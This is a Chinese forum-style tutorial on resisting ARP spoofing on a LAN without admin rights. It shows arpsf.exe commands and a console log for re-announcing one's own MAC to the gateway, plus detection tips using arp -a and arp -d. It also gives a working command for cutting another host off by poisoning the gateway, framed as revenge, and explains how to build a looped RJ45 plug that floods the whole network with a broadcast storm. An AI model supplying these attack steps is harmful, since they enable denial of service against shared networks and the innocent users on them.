非网管对付ARP欺骗的一个思路
首先不知道ARP欺骗的先参考其他文章,另外我不会详细地写具体过程,但是只要你自己动动手,一切都是那么简单。
ARP欺骗有两个目标,一种是欺骗网关,比如NETCUT,一种欺骗目标主机,比如你的电脑,对于欺骗目标主机的比如聚生网管,只要是XP系统,使用网关IP-MAC绑定后,他们都无法在对你进行欺骗,如果对方用IP地址冲突,那你装个防火墙就可以解决了。
麻烦的是用NETCUT等来欺骗网关的,因为你不是网管,否则直接在网关上绑定IP-MAC就行了,但是你现在除了一条网线连到交换机其他你没有任何可动的东西,你明明知道有人欺骗网关让你上不去网,但是你没有办法破解。
下面我介绍使用一个叫做ArpCheatSniffer V1.0的小软件,该软件可以嗅探和欺骗,我们主要用它的欺骗功能,这个软件发送ARP查询的速度要比NETCUT的快的多,所以当有人用NETCUT从网关上剪断你的时候,你就可以用这个DD向网关发送你的正确的MAC地址,也就是说你一直保持网关*的IP-MAC关系是正确的。
附件是ArpCheatSniffer V1.0
这个软件需要安装WINPCAP,附件中自带的WINPCAP好像只能用于2000的系统,XP似乎是不能读取网卡,我用NETCUT1.5自带安装的WINCAP就可以
对于XP系统的的使用,我建议先在网上找个1.5的NETCUT安装到你电脑,这样就会附带安装一个WINPCAP,至于 WINPCAP3.0和3.1,我测试了不行。
安装完WINPCAP,将附件中的arpsf.exe拷贝到比如C盘,然后用CMD打开命令台,在C:根目录下执行arpsf.exe(注意大小写),就会有该小工具的使用帮助,我们用的命令主要是
arpsf -onlycheat -t 受骗主机 -c 源IP 原MAC地址
然后读取网卡,你选择网卡号码,比如0,之后软件自动读取MAC地址并开始欺骗。
举例子,比如网关是192.168.0.1 我的主机地址是2,我的真实MAC是888888888888
当我被NETCUT剪掉的时候,我用这个工具让他一直发送真确的MAC地址给网关
就执行 arpsf -onlycheat -t 192.168.0.1 -c 192.168.0.2 888888888888
之后就可以正常上网了,NETCUT就拿你没办法了。
当然我们现在是用它来反欺骗,你也可以用它来欺骗网关,对破坏网络的人以牙还牙,或者比如破坏网络的人的MAC地址是666666666666,那你也可以这样剪掉它
arpsf -onlycheat -t 192.168.0.1 -c 10.10.10.10 666666666666
这个 10.10.10.10可以任意指定,只要不是特殊地址就可以,当然不能是那个倒霉蛋的真实IP。
下面是我运行arpsf欺骗网关的一个例子:
==========================
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>cd\
C:\>arpsf -onlycheat -t 192.168.4.254 -c 192.168.4.52 333333333333
======================================================
Arp Cheat And Sniffer V1.0
powered by shadow @2005/5/8
my web:[URL="http://www.codehome.6600.0rg"]http://www.codehome.6600.0rg[/url]
======================================================
Windows ver is NT
0:\Device\Packet_{DBEF277B-BA37-41EE-889E-97E512B5F28B}
1:\Device\Packet_NdisWanIp
2:\Device\Packet_NdisWanBh
Please choose a adapter with num:0
Try to get Mac of [ 192.168.4.52 ]
This IP's MAc is: [ 00e04c54e56b ]
+OK:获取获取欺骗源真实mac地址成功!
Try to get Mac of [ 192.168.4.254 ]
-Can not get mac by netbios -_-
-Try to use ping to get mac...
Pinging 192.168.4.254 with 32 bytes of data:
Reply from 192.168.4.254: bytes=32 time<1ms TTL=255
Reply from 192.168.4.254: bytes=32 time<1ms TTL=255
Reply from 192.168.4.254: bytes=32 time<1ms TTL=255
Reply from 192.168.4.254: bytes=32 time<1ms TTL=255
Ping statistics for 192.168.4.254:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
+ping ok done...
This IP's MAc is: [ 0015f973be00 ]
+OK:获取目标mac地址成功!
欺骗源ip: 192.168.4.52 欺骗源mac: 333333333333
受骗主机: 192.168.4.254 受骗的mac: 0015f973be00
-->开始欺骗主机...
................................................................................
......^C
C:\>
================================
只要不关掉窗口,欺骗/反欺骗就一直进行下去。
最后附上怎么去检测是你主机被欺骗了还是网关被欺骗了
运行arp -a 查看记录,如果发现网关指向的地址不是真实的网关地址,那么你主机就是被人欺骗了,甚至你可以看到有两个IP都是这个地址,那这个IP就是那个破坏者。
如果主机没有被欺骗还是上不了网
那么你ping -t 网关,如果这时候能通,那可能是网关上有什么限制不能上网,没办法搞,如果不通,网关又是开着的,那么你可以再打开一个窗口用arp -d删掉arp缓存记录,这样你ping 网关的时候你电脑会向网关发送arp请求,如果是因为网关被人欺骗,那么在你删掉缓存后的几个ICMP包是可以正确地从网关返回来的,也就是ping 通了,几个数据包后又断了(因为有人一直在欺骗网关),然后再删除缓存,又可以通几秒钟。
有时候也许那个破坏者是网管,你也可以尝试修改你的网卡地址和IP地址然后再进行。
最后,教个更绝的办法,做个水晶头,将1、3脚和2、6脚分别短接,然后用直通的水晶头转换器(不知道怎么叫,就是两边都是RJ45座的那种)将你的网线和这个特殊的水晶头连起来,哼,不让上网?那么大家都不要上了,这个是死循环啊要被鞭笞的,整个网络都是网络风暴,什么黑客什么欺骗什么攻击统统无用,当然自己也不能用网络了,而且后果可能是你的网线被网管从交换机上拔下来并警告通缉!!一般情况千万不要这样做,如果有重要的数据业务那你惹祸就大了。到时候我可不说这是我告诉你的。
